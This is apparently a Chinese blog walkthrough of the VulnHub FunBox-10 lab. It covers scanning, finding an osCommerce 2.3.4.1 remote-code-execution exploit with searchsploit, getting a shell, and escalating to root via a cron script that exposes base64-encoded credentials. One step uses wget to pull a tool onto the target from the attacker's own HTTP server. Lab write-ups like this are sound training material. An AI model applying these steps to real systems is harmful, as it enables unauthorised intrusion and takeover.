vulnhub靶场之FunBox-10

devtools/2024/9/23 9:31:18/

一.环境搭建

1.靶场描述

As always, it's a very easy box for beginners.
This works better on VitualBox rather than VMware 

2.靶场下载

Funbox: Under Construction! ~ VulnHub

image-20240601200957812

3.靶场启动

image-20240601201039869

靶场IP地址我们不知道,但是网段我们知道是192.168.2.0/24

二.信息收集

1.寻找靶场真实IP地址

nmap -sP 192.168.2.0/24

image-20240601201306195

arp-scan -l

image-20240601201341570

通过上面两个命令我们知道,靶场IP地址为192.168.2.12

2.探测端口及服务

nmap -p- -sV 192.168.2.12

image-20240601201555704

开启了22端口,服务为ssh
开启了25端口,服务为smtp
开启了80端口,服务为Apache httpd 2.4.18 ((Ubuntu))
开启了110端口,服务为pop3  
开启了143端口,服务为imap   

三.渗透测试

1.访问web服务

http://192.168.2.12

image-20240601201945838

2.扫描web服务

1)nikto扫描

image-20240601202217331

扫描也没有

2)dirb扫描

image-20240601202758265

3)dirsearch扫描

image-20240601202820443

4)gobuster扫描

image-20240601202606520

通过上面的扫描,我们只扫描到一个路径/catalog,我们进行查看

3.渗透测试

1)访问/catalog

http://192.168.2.12/catalog/install/index.php

image-20240601202846664

我们可以看到osCommerce是一个电子商务系统,而且知道它的版本是2.3.4.1,我们进行搜索相关的漏洞

image-20240601203035139

2)搜索相关漏洞

searchsploit osCommerce 2.3.4.1

image-20240601203312680

我们可以看到一个python脚本,我们下载下来进行查看

3)下载python脚本

searchsploit  -m php/webapps/44374.py

image-20240601203458667

image-20240601203707296

4)反弹脚本

image-20240601204459715

image-20240601205001683

记得一定要访问这个页面,不然的话反弹不成功

http://192.168.2.12/catalog/install/includes/configure.php

image-20240601205022179

image-20240601205257017

我们可以看到权限比较低,我们进行提升权限

5)提权

find / -user root -perm -4000 -print 2>/dev/null 发现没有什么可以利用的

image-20240601210625310

我们利用pspy

黑客可以利用它来查看其他用户的计划任务工作 (cron job)等,该工具也非常适合技术人员在CTF(Capture The Flag)中枚举Linux系统。 pspy是一个 命令行工具 ,它可以在没有Root权限的情况下,监控Linux进程.

GitCode - 全球开发者的开源社区,开源代码托管平台

image-20240601210942360

我们进行下载,然后上传到靶机里面

python -m http.server 8080

wget http://192.168.2.9:8080/pspy64

image-20240601211705388

因为添加执行权限需要权限,我们切换到/tmp/目录下

image-20240601211922746

我们添加权限,执行脚本

image-20240601212056381

执行脚本,我们发现有个cron的定时任务

image-20240601215104464

脚本执行了很长时间

cat /usr/share/doc/examples/cron.sh
我们发现了一个加密的参数,是用base64加密的文件(以”==”结尾的多半是base64加密),我可以尝试解密,解码后发现是root的密码和账户,我们可以尝试登录

image-20240601215443427

image-20240601215637811

我们可以看到root密码是rfvbgt!!

image-20240601215816672

渗透测试结束


http://www.ppmy.cn/devtools/45441.html

相关文章

如何利用python下载原创力文档

原创力文档是一个文档资源共享平台,文档内容类型丰富,包含计算机、高等教育、金融投资、医药卫生、汽车机械、外语学习、报告分析、法律法规、研究生考试、电子工程、经济贸易、建筑施工、幼儿小学教育、中学教育、文学历史、资格认证考试、人力资源、学…

【网络协议Http】Http中get,post,put,delete区别

Http协议 超文本传输协议(Hypertext Transfer Protocol,HTTP)是一个简单的请求-响应协议,它通常运行在TCP之上。 【参考】 GET && POST 对比 关于tcp数据包:对于GET方式的请求,浏览器会把http hea…

Python——cv2 判断图像读取内容是否为空

import cv2 pic_path"xxx.jpg" imagecv2.imread(pic_path) if None image:print("图片为空") else:print("图片不为空")

575. 分糖果

题目 Alice 有 n 枚糖,其中第 i 枚糖的类型为 candyType[i]。Alice 注意到她的体重正在增长,所以前去拜访了一位医生。 医生建议 Alice 要少摄入糖分,只吃掉她所有糖的 n / 2 即可(n 是一个偶数)。Alice 非常喜欢这些…

智能优化算法 | Matlab实现ABC人工蜂群优化算法

智能优化算法 | Matlab实现ABC人工蜂群优化算法 文章目录 智能优化算法 | Matlab实现ABC人工蜂群优化算法文章概述源码设计文章概述 智能优化算法 | Matlab实现ABC人工蜂群优化算法。 源码设计 function BestCost = ABC(fhd,funcNum,nPop,MaxIt,Lb,Ub,dim

android源码下载编译模拟器运行

安卓aosp源码下载,编译,模拟器运行 virtualbox7 安装ubuntu20.04,ubuntu22.04 编译android aosp 源码可以,但是模拟器跑不了,哪个版本都是要么黑屏,要么整个vbox虚拟机闪退。解决方案使用vmware17 ##拯救…

SQL入门全攻略(一)

一、引言 在当今的数据驱动世界中,SQL(结构化查询语言)无疑是数据处理和分析的基石。无论你是数据科学家、数据库管理员还是业务分析师,掌握SQL都是必不可少的技能。本文将带你从SQL的基础知识开始,逐步深入&#xff…

springboot发送短信验证码,结合redis 实现限制,验证码有效期2分钟,有效期内禁止再次发送,一天内发送超3次限制

springboot结合redis发送短信验证码,实现限制发送操作 前言(可忽略)实现思路正题效果图示例手机号不符合规则校验图成功发送验证码示例图redis中缓存随机数字验证码,2分钟后失效删除redis缓存图验证码有效期内 返回禁止重复发送图验证码24小时内发送达到3次&#xf…